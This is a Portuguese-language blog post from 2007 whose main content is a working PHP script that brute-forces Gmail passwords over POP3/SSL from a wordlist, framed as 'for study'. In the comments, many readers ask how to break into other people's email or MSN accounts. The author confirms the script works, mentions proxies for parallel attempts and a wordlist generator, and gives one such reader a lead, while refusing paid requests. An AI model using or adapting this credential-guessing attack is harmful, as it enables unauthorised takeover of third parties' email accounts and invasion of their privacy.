Silici0 :: Blog

Setembro 10, 2007 on 11:38 am | In Informatica, php, Hacker |

Abrirei uma nova sessão de hacks, não afim de que meus leitores ownem (?) o mundo, mas sim para aprender os hacks de php afim de bolar soluções para se proteger contra isso. Vou começar com um hack para descobrir senhas utilizando BrutalForce no PHP através do POP3 dos emails, não irei explicar o que significa os jargões e como obter informações, sim somente uma demonstração de um código que foi disponibilizado pela Webzine do 0x000000.

Feito o script para o gmail, afim de que vejam que o nome do usuário é o email e por isso ja temos 50% de chance a mais para o hack. O script consegue ser rodado para qualquer tipo de POP3 baseado em SSL, como hotmail e muitos outros pela net.

o Código:

PHP:

error_reporting(0);
ini_set("max_execution_time",0);
function bruteforce($email) {
$passlist = array('foo','bar','hello','world','abc','123','bazooka','joe');
$start = 0;
while($forced == false && $start <= count($passlist)) {
usleep(1000000);
$ssl = fsockopen("ssl://pop.gmail.com", 995, $err, $errdata, 40);
if (!$ssl) {
echo "$errdata" . " => " . "$err";
} else {
$auth = fgets($ssl, 128);
fputs($ssl, "USER ".$email."\n");
$auth = fgets($ssl, 128);
fputs($ssl, "PASS ".$passlist[$start]."\n");
$auth = fgets($ssl, 128);
$status = substr($auth, 0, 4);
if($status == "+OK ") {
$forced = true;
}
if($status == "-ERR") {
$forced = false;
$start++;
}
fclose ($ssl);
if($forced) {
echo "
<div style='background-color:lime;font-size:16px;'>Password found: $passlist[$start]</div>
";
}
}
}
return $forced;
}
bruteforce("bazookajoe@gmail.com");

46 Comments »

Uia! O Silic0 é hacker e eu nao sabia? Vou testar isso aqui, Juro que se aparecer a senha do meu e-mail eu vou ficar assustado. Gostei de blog. Assinadasso =) Abraçuuu

Comment by Fill — Setembro 12, 2007 #

HAHAHAHA...

So gerar a lista e rodar o BrutalForce...
So calcular um tempo ai, vai demorar umas semanas.

Mas da para char facim.

Abraços

Comment by silici0 — Setembro 12, 2007 #

tipo assim nao entendi nada como q faz isso??????

Comment by oi — Outubro 16, 2007 #

ai fica dificil em...

Em que parte você não entendeu?

Abraços

Comment by silici0 — Outubro 16, 2007 #

Cara muito bom seu script, testei aki e funcionou, mas ...
como seria no caso de fazer com que o script fizesse tentativa por brute force ( caracter por caracter ) sem usar lista de possiveis senhas?

Dona Iguana

Comment by iguana — Outubro 17, 2007 #

Para ser sincero eu nao testei ainda, acredito que voce pode abrir a conexao ssl e depois ler a lista e tentar ir trocando a senha ate ter resposta certa.

Nao se preucupe com o tempo o negocio eh demorado mesmo, por isso existem softwares que utilizam proxy para manter umas 5/10/20 tentativas ao mesmo tempo.

ehhee

Abracos

Comment by silici0 — Outubro 17, 2007 #

Fala brother... po não funfo aqui o script não :S
usando em localhost da erro ' 4408Unable to find the socket transport "ssl" '... e na web resulta uma pagina em branco
sabe me dizer qq é isso?

abs

Comment by rasp — Novembro 2, 2007 #

Provavelmente erro no fsockopen no seu localhost, verifique configurações do php para ver se utiliza e esta instalo suporte a essa função e outras.

Em relação a página em branco so voçe olhar o codigo e entende-lo..
Da um debug nele.

Abraços

Comment by silici0 — Novembro 5, 2007 #

aiii vc podeee tentaaa entraaa nooo meeeu orkut milk... fui paz

Comment by Guilherme — Novembro 27, 2007 #

aaiiii me mandaaaa poooo email Jaaa eh fui milk paz

Comment by Guilherme — Novembro 27, 2007 #

como consigo a senha do msn de uma pessoa ou como consigo rastrear tudo q essa pessoa digita no sem pc, inclusive suas conversas pelo msn. sei q existe um programa q manda tudo para o meu email. me ajudem, por favor!

Comment by alex — Dezembro 13, 2007 #

Não faço idéia...

Me desculpe, mas a idéia do script é para fins de estudo das funções e funcionamentos...

Comment by silici0 — Dezembro 13, 2007 #

gostei do post !!!!
naum consigo entrar no meu gmail eskeci a senha, teria como vc descobrir, me manda um email

aobrigado

Comment by andre — Fevereiro 2, 2008 #

eu kero ke vc fex
me dar senha

Comment by fabiana — Abril 29, 2008 #

Fabiana ?! não entendi

Comment by silici0 — Abril 29, 2008 #

Legal. Na verdade eu queria uma ajuda para consiguir o msn de uma pessoa q me vendeu um playstation 2 e sumiu do mapa. Q fria, vigatista!
Queria alguma pista q me levasse a ele.
Grato por qualquer ajuda.

Comment by Adriano Santos — Maio 2, 2008 #

Eu acho que seu melhor amigo é o google, para que possa achar o cara...

Se tiver dados pessoais dele, vá a polícia, procom e Pro teste...

Abraços

Comment by silici0 — Maio 2, 2008 #

viu esse negócio funciona como mesmo?! o que tem que fazer com esse código?! com ele consigo descobrir a senha de pessoas só tendo o e-mail delas e sem precisar do acesso delas no meu pc?!

Comment by Marcia — Maio 5, 2008 #

Funciona como a Dona Iguana testou e comprovou, pode rodar o script de qualquer local, você so precisa de uma lista de brutal force bem completa. ;P

Abraços

Comment by silici0 — Maio 5, 2008 #

[...] Bom, pensando no script para brutal Force no gmail que postei fiquei pensando; como podemos gerar uma lista de palavras para que possamos testar o script ? Existem diversas wordlist generator por ae, porém precisamos uma em php que construa e teste; gerar um arquivo TXT é uma lastima, pois fica gigantesto, então nada de pegar pronto, o negocio é gerar na mão. Mas o que é esse tal de wordlist então ? Nós podemos chamar de dicionário de palavras, nesta lista terá as palavras inimaginarias e imaginarias para que ao tentar crackear uma conta teste cada palavra como senha, o ideal para está lista seria ter todos as possíveis palavras. [...]

Pingback by Silici0 :: Blog » WordList em PHP para cracks — Maio 8, 2008 #

realmente .. pode ate funcionar .. mas demora .. e demora muitoooo

Comment by la la la — Maio 28, 2008 #

fiz uma compra e o malandro n me enviou o produto, como descubro a senha do gmail dele, eu tendo so o login?

Comment by FElipe andrade — Maio 29, 2008 #

Como é que copia??

Comment by anonimo — Junho 29, 2008 #

e ai mano

Comment by marcelo — Julho 16, 2008 #

error_reporting(0);

ini_set("max_execution_time",0);

function bruteforce($email) {

$passlist = array('foo','bar','hello','world','abc','123','bazooka','joe');

$start = 0;

while($forced == false && $start " . "$err";

} else {

$auth = fgets($ssl, 128);

fputs($ssl, "USER ".$email."\n");

$auth = fgets($ssl, 128);

fputs($ssl, "PASS ".$passlist[$start]."\n");

$auth = fgets($ssl, 128);

$status = substr($auth, 0, 4);

if($status == "+OK ") {

$forced = true;

}

if($status == "-ERR") {

$forced = false;

$start++;

}

fclose ($ssl);

if($forced) {

echo "
Password found: $passlist[$start]
";

}

return $forced;

}

bruteforce("bazookajoe@gmail.com");

Comment by marcelo — Julho 16, 2008 #

alguem pode me passar um e-mail esplicando passo a passo como fazer isso?....por favor é pq eu fiquei confuso, abraço.

Comment by Matheus — Julho 24, 2008 #

POR FAVOR... EU LI PESSO

Comment by Matheus — Julho 24, 2008 #

POHA ISSO NEM EXISTE E AINDA E PRO GMAIL SEUS NUB

Comment by poha — Agosto 9, 2008 #

Faz tempo que nao uso a palvra então la vai!...
N00b acima detected.
Boa diversão a todos.

Comment by silici0 — Agosto 10, 2008 #

Querido, como eu não entendi nada... vamos incurtar o assunto
Quanto vc cobra p/ me enviar senha de um e-mail ???
Sem enfiar a faca é claro rsrs

Comment by danielle — Agosto 12, 2008 #

Desculpe, eu não faço esse tipo de trabalho, o intuito do texto é sobre o funcionamento e aprendizado...

Abraços

Comment by silici0 — Agosto 12, 2008 #

como se usa esse treco

Comment by patricia — Agosto 16, 2008 #

Cara, isso funfa no Hotmail tmb??
Flws

Comment by DanN — Setembro 2, 2008 #

Olá ,

A senha do meu antigo e-mail foi roubada a pessoa mudou a senha e não consigo , mas entrar nele! Era gmail, há como recuperar a senha?

Comment by pedro — Setembro 8, 2008 #

Desculpe mas n percebi como e onde é k meto esse código para descobrir uma pass

Comment by Sandra — Setembro 17, 2008 #

Como eu descubro senha do HOTMAIL???

Comment by João — Outubro 11, 2008 #

Olá como usa isso para descobrir senhas eu não entendi.. se puderem me explicar agradeço

Comment by lisa — Outubro 15, 2008 #

Por favor, explique por miudos como é k fazemos isso.

Comment by Sandra — Outubro 20, 2008 #

Vocês tem que conhecer programação PHP, como funciona serviços de emails e afins, o propósito aqui não é sair hackeando senhas nem nada do gênero, é simplemente um texto sobre como funciona emails e conexãos, para criação de aplicativos front-end talves.

Abraços

Comment by silici0 — Outubro 20, 2008 #

cara...preciso de uma ajudinha...
tem um email que to querendo a senha, sei que tu não fez isso com o objetivo de hackear e tal...mas preciso ^^
bom...aqui tenho algumas informações sobre o servidor/email lá...
Apache 2.0.59 (FreeBSD) PHP 5.2.1
IMAP + PHP 4
tem alguma luz? ^^

Comment by ;) — Outubro 27, 2008 #

ahhhh
com Suhosin-Patch Server
^^

Comment by ;) — Outubro 27, 2008 #

Com php ?

Você pode usar uma classe smtp para tentar as conexões, procure sobre as classes em phpclasses.org

Abraços

Comment by silici0 — Outubro 27, 2008 #

ele vive me xingano

Comment by thayna — Outubro 30, 2008 #

quero a senha do gmail e do hotmail do meu filho, dá pra descobrir?

Comment by vania — Novembro 9, 2008 #

amigos precisava de saber como faço para conseguir password do hotmail e do sapo.